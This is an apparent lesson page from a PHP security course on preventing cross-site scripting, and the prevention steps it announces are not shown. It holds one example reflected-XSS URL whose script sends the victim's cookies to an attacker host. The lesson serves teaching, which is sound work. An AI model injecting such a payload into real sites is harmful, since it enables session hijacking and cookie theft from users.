PHP Academy · Lesson

Cross-Site Scripting (XSS) Prevention

Escape output with htmlspecialchars and implement a Content Security Policy.

What is XSS?

Cross-Site Scripting (XSS) occurs when an attacker injects malicious JavaScript into web pages viewed by other users. The script runs in the victim's browser with access to their session, cookies, and DOM.

Reflected XSS

The malicious payload is in the URL or form parameter, reflected by the server in the response.

// Malicious URL:
https://example.com/search?q=<script>document.location="https://attacker.com/steal?c="+document.cookie</script>

All lessons in this course

Cross-Site Scripting (XSS) Prevention
SQL Injection and Parameterized Queries
CSRF Protection
Secure Password Storage

← Back to PHP Academy